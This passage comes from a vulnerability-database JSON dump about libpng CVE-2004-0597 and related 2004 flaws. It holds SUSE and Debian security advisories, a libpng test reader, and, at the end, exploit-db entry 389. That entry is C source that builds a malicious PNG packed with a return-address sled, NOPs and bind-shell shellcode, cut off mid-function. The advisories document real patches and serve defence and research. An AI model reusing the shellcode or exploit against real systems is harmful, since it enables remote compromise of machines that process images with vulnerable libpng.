different security vulnerabilities were found in the PNG library which is used by applications to support the PNG image format.", "edition": 1, "modified": "2004-08-04T15:12:06", "published": "2004-08-04T15:12:06", "id": "SUSE-SA:2004:023", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-08/msg00005.html", "type": "suse", "title": "remote system compromise in libpng", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:10:59", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0691", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0815", "CVE-2004-0757", "CVE-2004-0599", "CVE-2004-0746", "CVE-2004-0597", "CVE-2004-0760", "CVE-2004-0598", "CVE-2004-0722", "CVE-2004-0759", "CVE-2004-0763", "CVE-2004-0761"], "description": "The Samba server, which allows to share files and resources via the SMB/CIFS protocol, contains a bug in the sanitation code of path names which allows remote attackers to access files outside of the defined share. In order to access these files, they must be readable by the account used for the SMB session. CAN-2004-0815 has been assigned to this issue.\n#### Solution\nAs a temporary workaround you can set the wide links = no option in smb.conf and restart the samba server. However an update is recommended nevertheless.", "edition": 1, "modified": "2004-10-05T14:57:32", "published": "2004-10-05T14:57:32", "id": "SUSE-SA:2004:035", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-10/msg00005.html", "type": "suse", "title": "remote file disclosure in samba", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0718", "CVE-2004-0748", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0597", "CVE-2004-0760", "CVE-2004-0722", "CVE-2004-0759", "CVE-2004-0751", "CVE-2004-0763", "CVE-2004-0761"], "description": "The mod_ssl apache module, as part of our apache2 package, enables the apache webserver to handle the HTTPS protocol. Within the mod_ssl module, two Denial of Service conditions in the input filter have been found. The CVE project assigned the identifiers CAN-2004-0748 and CAN-2004-0751 to these issues.\n#### Solution\nAs temporary workaround you may disable the mod_ssl module in your apache configuration and restart the apache process without SSL support.", "edition": 1, "modified": "2004-09-06T13:51:41", "published": "2004-09-06T13:51:41", "id": "SUSE-SA:2004:030", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00009.html", "title": "remote DoS condition in apache2", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:41:56", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0558", "CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0827", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0805", "CVE-2004-0801", "CVE-2004-0597", "CVE-2004-0760", "CVE-2004-0722", "CVE-2004-0759", "CVE-2004-0763", "CVE-2004-0761"], "description": "The Common Unix Printing System (CUPS) enables local and remote users to obtain printing functionallity via the Internet Printing Protocol (IPP). Alvaro Martinez Echevarria has found a remote Denial of Service condition within CUPS which allows remote users to make the cups server unresponsive. Additionally the SUSE Security Team has discovered a flaw in the foomatic-rip print filter which is commonly installed along with cups. It allows remote attackers, which are listed in the printing ACLs, to execute arbitrary commands as the printing user 'lp'.\n#### Solution\nIf you use CUPS, we recommend an update in any case. Additionally the IPP port (TCP port 631) should be firewalled and the printing ACLs should be set up in a way to reflect the local security policy.", "edition": 1, "modified": "2004-09-15T14:45:26", "published": "2004-09-15T14:45:26", "id": "SUSE-SA:2004:031", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00010.html", "title": "remote code execution in cups", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0788", "CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0784", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0494", "CVE-2004-0782", "CVE-2004-0783", "CVE-2004-0597", "CVE-2004-0722", "CVE-2004-0832", "CVE-2004-0785", "CVE-2004-0759", "CVE-2004-0754", "CVE-2004-0763", "CVE-2004-0761"], "description": "gdk-pixbuf is an image loading and rendering library mostly used by GTK and GNOME applications. It is distributed as a separate package for gtk1 and integrated into the gtk2 package. Chris Evans has discovered a heap based, a stack based and an integer overflow in the XPM and ICO loaders of those libraries. The overflows can be exploited by tricking an application to display a malformed image to make it crash or to execute code.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2004-09-17T10:02:50", "published": "2004-09-17T10:02:50", "id": "SUSE-SA:2004:033", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00012.html", "title": "remote code execution in gtk2, gdk-pixbuf", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:39", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0688", "CVE-2004-0765", "CVE-2004-1170", "CVE-2004-0687", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0784", "CVE-2004-0807", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0494", "CVE-2004-0808", "CVE-2004-0597", "CVE-2004-0722", "CVE-2004-0832", "CVE-2004-0785", "CVE-2004-0759", "CVE-2004-0754", "CVE-2004-0763", "CVE-2004-0761"], "description": "Chris Evans reported three vulnerabilities in libXpm which can be exploited remotely by providing malformed XPM image files. The function xpmParseColors() is vulnerable to an integer overflow and a stack-based buffer overflow. The functions ParseAndPutPixels() as well as ParsePixels() is vulnerable to a stack-based buffer overflow too. Additionally Matthieu Herrb found two one-byte buffer overflows.\n#### Solution\nThere is no workaround known.", "edition": 1, "modified": "2004-09-17T13:37:17", "published": "2004-09-17T13:37:17", "id": "SUSE-SA:2004:034", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00013.html", "type": "suse", "title": "remote command execution in XFree86-libs, xshared", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:20", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0788", "CVE-2004-0786", "CVE-2004-0765", "CVE-2004-0747", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0784", "CVE-2004-0807", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0494", "CVE-2004-0808", "CVE-2004-0782", "CVE-2004-0783", "CVE-2004-0597", "CVE-2004-0722", "CVE-2004-0832", "CVE-2004-0785", "CVE-2004-0759", "CVE-2004-0754", "CVE-2004-0763", "CVE-2004-0761"], "description": "The Apache daemon is running on most of the web-servers used in the Internet today. The Red Hat ASF Security-Team and the Swedish IT Incident Center within the National Post and Telecom Agency (SITIC) have found a bug in apache2 each. The first vulnerability appears in the apr_uri_parse() function while handling IPv6 addresses. The affected code passes a negative length argument to the memcpy() function. On BSD systems this can lead to remote command execution due to the nature of the memcpy() implementation. On Linux this bug will result in a remote denial-of-service condition. The second bug is a local buffer overflow that occurs while expanding ${ENVVAR} in the .htaccess and httpd.conf file. Both files are not writeable by normal user by default.\n#### Solution\nThere is no known workaround.", "edition": 1, "modified": "2004-09-15T15:46:39", "published": "2004-09-15T15:46:39", "id": "SUSE-SA:2004:032", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00011.html", "title": "remote denial-of-service in apache2", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:14:47", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1363", "CVE-2004-0768", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 536-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nAugust 4th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : libpng\nVulnerability : several\nProblem-Type : local/remote\nDebian-specific: no\nCVE Ids : CAN-2004-0597 CAN-2004-0598 CAN-2004-0599 CAN-2004-0768\n\nChris Evans discovered several vulnerabilities in libpng:\n\n CAN-2004-0597 - Multiple buffer overflows exist, including when\n handling transparency chunk data, which could be exploited to cause\n arbitrary code to be executed when a specially crafted PNG image is\n processed\n\n CAN-2004-0598 - Multiple NULL pointer dereferences in\n png_handle_iCPP() and elsewhere could be exploited to cause an\n application to crash when a specially crafted PNG image is processed\n\n CAN-2004-0599 - Multiple integer overflows in png_handle_sPLT(),\n png_read_png() nctions and elsewhere could be exploited to cause an\n application to crash, or potentially arbitrary code to be executed,\n when a specially crafted PNG image is processed\n\nIn addition, a bug related to CAN-2002-1363 was fixed:\n\n CAN-2004-0768 - A buffer overflow could be caused by incorrect\n calculation of buffer offsets, possibly leading to the execution of\n arbitrary code\n\nFor the current stable distribution (woody), these problems have been\nfixed in libpng3 version 1.2.1-1.1.woody.7 and libpng version\n1.0.12-3.woody.7.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you update your libpng and libpng3 packages.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.0.12-3.woody.7.dsc\n Size/MD5 checksum: 579 28fa419216a24ee3bfc2379864cb08af\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.0.12-3.woody.7.diff.gz\n Size/MD5 checksum: 9742 75a375a67bb78301d9a9ebe821b3f2b2\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.0.12.orig.tar.gz\n Size/MD5 checksum: 481387 3329b745968e41f6f9e55a4d04a4964c\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7.dsc\n Size/MD5 checksum: 583 3976057544097db61b33f953b803d947\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7.diff.gz\n Size/MD5 checksum: 29676 0501708a687b71e449f81cd3e61868d6\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1.orig.tar.gz\n Size/MD5 checksum: 493105 75a21cbfae566158a0ac6d9f39087c4d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_arm.deb\n Size/MD5 checksum: 108834 65c7d7fb818332e8c0a5948450289d6f\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_arm.deb\n Size/MD5 checksum: 241392 785d7cc63274c17c1b6f54020e55b047\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_arm.deb\n Size/MD5 checksum: 247654 8fcf3de4c503230ec009cd60d852ed8e\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_arm.deb\n Size/MD5 checksum: 112036 159d56f98ca67efae5b941c8c125f7fb\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_i386.deb\n Size/MD5 checksum: 107012 6c0c53769987b0e612315a27d426c31b\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_i386.deb\n Size/MD5 checksum: 226982 93ab2de59fd31cdd270220a9bf470aab\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_i386.deb\n Size/MD5 checksum: 233652 7a723facf934ca726426fcccbea044c1\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_i386.deb\n Size/MD5 checksum: 110350 aaa13f7b82894d332b0d93812eccf245\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_ia64.deb\n Size/MD5 checksum: 147182 a42677c2dc15d9c7e69084c794adb1f1\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_ia64.deb\n Size/MD5 checksum: 271760 3602ac433e9acb291264ac4631466b1b\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_ia64.deb\n Size/MD5 checksum: 278832 f40345e28c0a8090e3d5cc0da0c47c83\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_ia64.deb\n Size/MD5 checksum: 151492 b4cf01f0f5a4584a9cc91d37059e3a18\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_hppa.deb\n Size/MD5 checksum: 128592 c290efcf7bca64a59b95df9bd40ea7c4\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_hppa.deb\n Size/MD5 checksum: 262498 bba030d36b2453f50fc5f8dd502193db\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_hppa.deb\n Size/MD5 checksum: 269714 97f2cc65b004d72d2f736c444a5eca02\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_hppa.deb\n Size/MD5 checksum: 132710 ad103af06ba1fd04bfc820a7c9469a04\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_m68k.deb\n Size/MD5 checksum: 103914 0397515db7b83fe0788c11878ff2f6fe\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_m68k.deb\n Size/MD5 checksum: 220716 eedf1c5c86848604fffc678e2522047e\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_m68k.deb\n Size/MD5 checksum: 226396 825cf323e0b2a20d7059b41ac50b5ffe\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_m68k.deb\n Size/MD5 checksum: 106862 c9426ed19e5cf9d5ffa3f4e5ad9575ba\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_mips.deb\n Size/MD5 checksum: 108912 f28b7b28829c5eccfc1879bf24f30d01\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_mips.deb\n Size/MD5 checksum: 240572 aa9f0be614c9b9e83035927bca2780a0\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_mips.deb\n Size/MD5 checksum: 247046 950eb986e2da18540cac6871fa724ec8\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_mips.deb\n Size/MD5 checksum: 112238 45ba391f6604228a5712b3933cd7918d\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_mipsel.deb\n Size/MD5 checksum: 108792 e1c23a58af661142d961b2cb9067a8ad\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_mipsel.deb\n Size/MD5 checksum: 240484 205b79c80e9d5a90ba39ce297ca7ccf9\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_mipsel.deb\n Size/MD5 checksum: 247000 d7fab207f6240fa1c8cca2b626543910\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_mipsel.deb\n Size/MD5 checksum: 112174 60c7d64b2256f05f8eb132b8e386731e\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_powerpc.deb\n Size/MD5 checksum: 110254 ed1c9f3cb6cfc64467ae83251beb8b2d\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_powerpc.deb\n Size/MD5 checksum: 234680 a728d61a234b60b14d6876c0d7d460b5\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_powerpc.deb\n Size/MD5 checksum: 240742 ae4b57d50f8f6e8f88f18fdfde81c9a8\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_powerpc.deb\n Size/MD5 checksum: 113340 3014018db3169c617d958b71fa0e119d\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_s390.deb\n Size/MD5 checksum: 110286 1ba753d363eb45b3b768ae26ce19f9dc\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_s390.deb\n Size/MD5 checksum: 229436 8ca7796466613d780a3442d831544bf9\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_s390.deb\n Size/MD5 checksum: 235056 dcfc35ced743c453935dea5f4c6e8b92\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_s390.deb\n Size/MD5 checksum: 113376 2a42876c22f968ae435382110d27741c\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_sparc.deb\n Size/MD5 checksum: 110312 f5db28252e4072d07f34da1b57bb2656\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_sparc.deb\n Size/MD5 checksum: 232132 32be4f2a4f7215f3760ac6ce7c222ab9\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_sparc.deb\n Size/MD5 checksum: 237786 2d36e99aab38db959088a646bbf9455b\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_sparc.deb\n Size/MD5 checksum: 113744 d67df8af224bbcb817c7cb004ece5bf7\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "id": "DEBIAN:DSA-536-1:B4858", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html", "title": "[SECURITY] [DSA 536-1] New libpng, libpng3 packages fix multiple vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T12:18:43", "description": "LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit. CVE-2004-0597. Local exploit for linux platform", "published": "2004-08-13T00:00:00", "type": "exploitdb", "title": "LibPNG <= 1.2.5 png_jmpbuf Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0597"], "modified": "2004-08-13T00:00:00", "id": "EDB-ID:393", "href": "https://www.exploit-db.com/exploits/393/", "sourceData": "#include <stdio.h> \r\n#include <stdlib.h> \r\n#include \"png.h\" \r\n\r\n/* The png_jmpbuf() macro, used in error handling, became available in \r\n * libpng version 1.0.6. If you want to be able to run your code with older \r\n * versions of libpng, you must define the macro yourself (but only if it \r\n * is not already defined by libpng!). \r\n */ \r\n\r\n#ifndef png_jmpbuf \r\n#define png_jmpbuf(png_ptr) ((png_ptr)->jmpbuf) \r\n#endif \r\n#define ERROR 1 \r\n#define OK 0 \r\n\r\nint read_png(char *file_name) /* We need to open the file */ \r\n{ \r\n png_structp png_ptr; \r\n png_infop info_ptr; \r\n unsigned int sig_read = 0; \r\n png_uint_32 width, height; \r\n int bit_depth, color_type, interlace_type; \r\n FILE *fp; \r\n\r\n if ((fp = fopen(file_name, \"rb\")) == NULL) \r\n return (ERROR); \r\n\r\n /* Create and initialize the png_struct with the desired error handler \r\n * functions. If you want to use the default stderr and longjump method, \r\n * you can supply NULL for the last three parameters. We also supply the \r\n * the compiler header file version, so that we know if the application \r\n * was compiled with a compatible version of the library. REQUIRED \r\n */ \r\n png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, \r\n NULL, NULL, NULL); \r\n\r\n if (png_ptr == NULL) \r\n { \r\n fclose(fp); \r\n return (ERROR); \r\n } \r\n\r\n /* Allocate/initialize the memory for image information. REQUIRED. */ \r\n info_ptr = png_create_info_struct(png_ptr); \r\n if (info_ptr == NULL) \r\n { \r\n fclose(fp); \r\n png_destroy_read_struct(&png_ptr, png_infopp_NULL, png_infopp_NULL); \r\n return (ERROR); \r\n } \r\n\r\n /* Set error handling if you are using the setjmp/longjmp method (this is \r\n * the normal method of doing things with libpng). REQUIRED unless you \r\n * set up your own error handlers in the png_create_read_struct() earlier. \r\n */ \r\n if (setjmp(png_jmpbuf(png_ptr))) \r\n { \r\n /* Free all of the memory associated with the png_ptr and info_ptr */ \r\n png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL); \r\n fclose(fp); \r\n /* If we get here, we had a problem reading the file */ \r\n return (ERROR); \r\n } \r\n\r\n /* Set up the input control if you are using standard C streams */ \r\n png_init_io(png_ptr, fp); \r\n\r\n /* If we have already read some of the signature */ \r\n png_set_sig_bytes(png_ptr, sig_read); \r\n\r\n /* \r\n * If you have enough memory to read in the entire image at once, \r\n * and you need to specify only transforms that can be controlled \r\n * with one of the PNG_TRANSFORM_* bits (this presently excludes \r\n * dithering, filling, setting background, and doing gamma \r\n * adjustment), then you can read the entire image (including \r\n * pixels) into the info structure with this call: \r\n */ \r\n png_read_png(png_ptr, info_ptr, PNG_TRANSFORM_IDENTITY, png_voidp_NULL); \r\n\r\n /* clean up after the read, and free any memory allocated - REQUIRED */ \r\n png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL); \r\n\r\n /* close the file */ \r\n fclose(fp); \r\n\r\n /* that's it */ \r\n return (OK); \r\n} \r\n\r\nint main(int argc, char **argv) \r\n{ \r\n\r\n if(argc < 2){ \r\n fprintf(stderr, \"Usage: %s <png>n\", argv[0]); \r\n return EXIT_FAILURE; \r\n } \r\n\r\n if(read_png(argv[1]) != OK){ \r\n fprintf(stderr, \"Error reading pngn\"); \r\n return EXIT_FAILURE; \r\n } \r\n\r\n return 0; \r\n} \n\n// milw0rm.com [2004-08-13]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/393/"}, {"lastseen": "2016-01-31T12:18:12", "description": "LibPNG Graphics Library Remote Buffer Overflow Exploit. CVE-2004-0597. Remote exploit for linux platform", "published": "2004-08-11T00:00:00", "type": "exploitdb", "title": "LibPNG Graphics Library Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0597"], "modified": "2004-08-11T00:00:00", "id": "EDB-ID:389", "href": "https://www.exploit-db.com/exploits/389/", "sourceData": "/* \r\n * exploit for libpng, tested on version 1.2.5 \r\n * infamous42md AT hotpop DOT com \r\n * \r\n * shouts to mitakeet (hope u patched :D) \r\n * \r\n * [n00b_at_localho.outernet] ./po \r\n * Usage: ./po < retaddr > [ outfile ] \r\n * \r\n * -all u need to give is retaddr, the default file it creates is controlled by \r\n * the define below, or u can pass a diff outfile name on the command line. \r\n * the output is not an entire png, just enough to trigger the bug. i've also \r\n * included a simple program to test with. \r\n * \r\n * [n00b_at_localho.outernet] netstat -ant | grep 7000 \r\n * [n00b_at_localho.outernet] gcc pnouch.c -Wall -o po \r\n * [n00b_at_localho.outernet] gcc pngslap.c -o slapped -lz -lm lib/libpng12.so \r\n * [n00b_at_localho.outernet] ./po 0xbffff8b0 \r\n * [n00b_at_localho.outernet] ./slapped britnay_spares_pr0n.png \r\n * libpng warning: Missing PLTE before tRNS \r\n * libpng warning: tRNS: CRC error \r\n * [n00b_at_localho.outernet] netstat -ant | grep 7000 \r\n * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN \r\n * \r\n */ \r\n#include <stdio.h> \r\n#include <sys/types.h> \r\n#include <netinet/in.h> \r\n#include <fcntl.h> \r\n#include <string.h> \r\n#include <unistd.h> \r\n#include <stdlib.h> \r\n \r\n\r\n#define OUTFILE \"britnay_spares_pr0n.png\" \r\n#define BS 0x1000 \r\n#define ALIGN 0 \r\n#define NOP 0x90 \r\n#define NNOPS 100 \r\n#define RETADDR_BYTES 300 \r\n \r\n\r\n#define die(x) do{ perror((x)); exit(EXIT_FAILURE);}while(0) \r\n \r\n\r\n/* identifies a file as a png */ \r\n#define MAJIC_LEN sizeof(png_majic) \r\nu_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a }; \r\n \r\n\r\n/* \r\n * appears first, gives len/width/etc. important part is setting the color type \r\n * to 0x03, byte 10 of the IHDR data. that signfies that a PALLETE chunk should \r\n * be present. but we dont have one, and that is how the len check is bypassed. \r\n * the chunk len includes only the data, not the len field itself, or the id, or \r\n * the crc at the end. these bytes are stolen from the advisory. \r\n */ \r\n#define IHDR_LEN sizeof(png_ihdr) \r\nu_char png_ihdr[] = { 0x00, 0x00, 0x00, 0x0d, /* chunk len */ \r\n 0x49, 0x48, 0x44, 0x52, /* chunk id */ \r\n 0x00, 0x00, 0x00, 0x5b, 0x00, 0x00, 0x00, 0x45, \r\n 0x08, 0x03, 0x00, 0x00, 0x01, \r\n 0x65, 0x33, 0x5a, 0xd6 /* chunk crc */ \r\n}; \r\n \r\n\r\n/* \r\n * this is the tRNS type chunk, this is the evil chunk that actually contains \r\n * the shellcode. \r\n */ \r\n#define TRNS_LEN sizeof(png_trns_len_id) \r\nu_char png_trns_len_id[] = { 0x00, 0x00, 0x00, 0x00, /* chunk len filled in*/ \r\n 0x74, 0x52, 0x4e, 0x53 /* chunk id */ \r\n /* begin chunk data */ \r\n /* retaddr, NOPS, shellcode, CRC will follow */ \r\n}; \r\n \r\n\r\n/* call them shell code */ \r\n#define SHELL_LEN strlen(sc) \r\nchar sc[] = \r\n \"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x58\\xc6\\x04\\x24\\x02\\x89\\xe6\" \r\n \"\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\" \r\n \"\\x6a\\x01\\x6a\\x02\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\" \r\n \"\\x10\\x56\\x50\\x89\\xe1\\xb0\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\" \r\n \"\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\" \r\n \"\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\" \r\n \"\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\" \r\n \"\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\"; \r\n \r\n\r\n \r\n\r\n \r\n\r\nint main(int argc, char **argv) \r\n{ \r\n int fd = 0, len = 0, x = 0, chunk_len = 0; \r\n char *filename = OUTFILE; \r\n u_char buf[BS]; \r\n u_long retaddr = 0; \r\n \r\n\r\n if(argc < 2){ \r\n fprintf(stderr, \"Usage: %s < retaddr > [ outfile ]\\n\", argv[0]); \r\n return EXIT_FAILURE; \r\n } \r\n if(argc > 2) \r\n filename = argv[2]; \r\n \r\n\r\n memset(buf, 0, BS); \r\n sscanf(argv[1], \"%lx\", &retaddr); \r\n \r\n\r\n /* create buffer: \r\n * png id - png ihdr - png trns - retaddr - NOPS - shell - crc(don't need) \r\n */ \r\n memcpy(buf, png_majic, MAJIC_LEN); \r\n len += MAJIC_LEN; \r\n memcpy(buf+len, png_ihdr, IHDR_LEN); \r\n len += IHDR_LEN; \r\n memcpy(buf+len, png_trns_len_id, TRNS_LEN); \r\n len += TRNS_LEN; \r\n \r\n\r\n for(x = 0; x < RETADDR_BYTES-3; x += 4) \r\n memcpy(buf+len+x+ALIGN, &retaddr, sizeof(retaddr)); \r\n x += ALIGN; \r\n len += x; \r\n memset(buf+len, NOP, NNOPS); \r\n len += NNOPS; \r\n memcpy(buf+len, sc, SHELL_LEN); \r\n len += SHELL_LEN; \r\n \r\n\r\n /* length of chunk data */ \r\n chunk_len = x + NNOPS + SHELL_LEN; \r\n *(u_long *)(buf+MAJIC_LEN+IHDR_LEN) = htonl(chunk_len); \r\n \r\n\r\n /* include the crc */ \r\n len += sizeof(u_long); \r\n 